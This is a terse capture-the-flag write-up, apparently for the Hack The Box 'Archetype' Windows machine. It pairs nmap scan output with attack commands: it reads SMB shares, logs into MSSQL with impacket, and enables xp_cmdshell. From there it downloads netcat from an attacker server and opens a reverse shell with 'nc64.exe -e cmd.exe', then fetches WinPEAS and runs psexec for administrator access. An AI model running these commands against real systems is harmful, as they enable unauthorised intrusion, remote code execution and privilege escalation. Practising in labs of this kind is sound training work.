Archetype
January 27, 2024
# Nmap 7.94 scan initiated Sat Jan 27 06:26:28 2024 as: nmap -sC -sV -oN nmap -vv 10.129.171.182
Increasing send delay for 10.129.171.182 from 0 to 5 due to 41 out of 136 dropped probes since last increase.
Increasing send delay for 10.129.171.182 from 10 to 20 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 10.129.171.182
Host is up, received conn-refused (0.25s latency).
Scanned at 2024-01-27 06:26:28 PST for 65s
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open �i�@V syn-ack Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info:
| 10.129.171.182:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-26T22:25:48
| Not valid after: 2054-01-26T22:25:48
| MD5: e9c3:8935:ecf0:84f2:0ae1:bbfc:2bfb:9e03
| SHA-1: b9d6:0ba9:1d39:00ae:0a72:743b:2d2a:b996:3945:b5d1
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQEXcxNuY4oKRK3CTHMZlRgjANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjQwMTI2MjIyNTQ4WhgPMjA1NDAxMjYyMjI1NDhaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMPisCIW
| KYPkaJ6FSy2uSzpGujM17iQQvJWFAlvslr1RodNhyopAGcE9uclyaoeAOF0ccB2p
| KbXj5v6QzeZFx5QFuhcv7juald8ysvzcVV9VvX19lnEn2i1Wt26WlZyhgBBwHUQY
| awOpMnBB7700gNrznn8D7NFM60um/GjlYu/hT+8B8BUoll5YjS31uQYcbGOHnkp4
| z0rx0Vswd6fGKYZSTRp+QLEdf7S14REDu5h+I6caN+8sZZ9KCeQcqznPpaOjbvF6
| BTZBh3mXwE+CRULOJZ7deJcNH6T+wrkpKfRiARd+8iybE1EDqxNgpYU2VWypYj96
| CslbsV7CyyhMsx0CAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAgaBIHXurD/q7eyJ5
| GOyhtzDCNLqUIeiZlY7Zf3Eov5J7p8WDMqZb8QnBnTkJYnHGcBrVGEzwp8CwoH4E
| 4VN/YyLcyT4biElYEiZxv62RFGqpWvEWwTrbBl1QPSAvm7lUtA2t223iNB83R+Y5
| pzPzQ5VJABDMFG7eVL3TE7YVRvwnrz2kVcRufqVduD3QtrfjQ4gnXUXEwrbWGhqm
| f2Z2X3gH5BDNbSzQwYfL9THu142/vzrLIe9Nc2A3Qt/6dsCIwTtKzvEXbpqMyMYp
| tpe79tvzkhM+tsb6KoAuexHGMCmfEDtEexHZQFQ88AuetV8zzVjiMZ9YY0g+EOSF
| Lw0utQ==
|_-----END CERTIFICATE-----
| ms-sql-ntlm-info:
| 10.129.171.182:1433:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
|_ssl-date: 2024-01-26T22:27:42+00:00; +9s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-26T22:27:32
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-01-26T14:27:31-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 59442/tcp): CLEAN (Couldn't connect)
| Check 2 (port 42495/tcp): CLEAN (Couldn't connect)
| Check 3 (port 53074/udp): CLEAN (Timeout)
| Check 4 (port 58756/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h36m09s, deviation: 3h34m41s, median: 8s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 27 06:27:33 2024 -- 1 IP address (1 host up) scanned in 65.86 secondsnmap -sV -p 445 10.129.171.182
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-27 06:30 PST
Nmap scan report for 10.129.171.182
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.22 secondsI just double nmap scan the port 445 because it bugs when using scripts
After that we will use smbclient to display the available shares in the smb
smbclient -L 10.129.171.182
Then we will connect to backups share
smbclient \\\\10.129.171.182\\backups
cat prod.dtsConfig
cd ~/impacket/examples
python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.171.182 -windows-auth
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.68:8000/nc64.exe -outfile nc64.exe"
Then after that we will execute the payload and get the reverse shell connection
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.68 443
cd ~/Downloads
python3 -m http.server
powershell
wget http://10.10.14.68:8000/winPEASx64.exe -outfile winPEASx64.exe
Just execute the winpeas
Then we get the result here
Move to that directory
cd ~/impacket/examples
python3 psexec.py administrator@10.129.171.182
Last updated